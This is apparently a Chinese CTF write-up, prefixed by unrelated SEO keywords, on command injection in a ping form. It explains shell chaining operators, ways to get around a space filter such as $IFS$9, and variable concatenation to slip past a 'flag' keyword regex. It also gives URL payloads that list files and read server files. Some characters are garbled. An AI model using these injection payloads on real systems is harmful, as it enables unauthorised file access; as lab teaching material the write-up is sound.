山东平台网站建设方案,随州网,旅游网站制作,wordpress lights本题考点#xff1a;
1、命令联合执行
2、命令绕过空格方法
3、变量拼接 1、命令联合执行 ; 前面的执行完执行后面的| 管道符#xff0c;上一条命令的输出#xff0c;作为下一条命令的参数#xff08;显示后面的执行结果#xff09;|| 当前面的执行出错时#xff08;为…本题考点
1、命令联合执行
2、命令绕过空格方法
3、变量拼接 1、命令联合执行 ; 前面的执行完执行后面的| 管道符上一条命令的输出作为下一条命令的参数显示后面的执行结果|| 当前面的执行出错时为假执行后面的 将任务置于后台执行 前面的语句为假则直接出错后面的也不执行前面只能为真%0a 换行%0d 回车 2、命令绕过空格 当我们执行系统命令时不免会遇到空格如cat flag.txt当空格被程序过滤时便需要利用以下字符尝试代替绕过 ${IFS} $IFS$9 %09 即 catflag.phpcat${IFS}flag.phpcat$IFS$9flag.php 3、变量拼接 比如我们想执行 cat flag.php但对方过滤了flag字符串 如preg_match(/.*f.*l.*a.*g.*/, $ip)这个的意思是匹配到按flag这个顺序的所有字符 那么我们就可以利用变量拼接绕过 ?ag;cat fla$a.php即可。 题目
进入题目
将地址赋给 ip 后会 ping 这个ip
那么我们尝试执行命令
?ip1; ls
回显如下
过滤了空格
利用 $IFS$9 进行过滤
?ip1;$IFS$9ls 通过回显我们可以知道在当前目录有flag.php和index.php文件。
尝试查看flag,php
?ip1;$IFS$9cat$IFS$9flag.php
回显如下
嘿flag被过滤了
那看看index.php怎么说
?ip1;$IFS$9cat$IFS$9index.php
回显如下
我们知道
preg_match(/.*f.*l.*a.*g.*/, $ip)这个的意思是匹配到按flag这个顺序的所有字符
那么我们直接通过变量拼接进行绕过尝试查看flag,php:
?ip1;ag;cat$IFS$9fla$a.php
查看网站源码即可得到flag
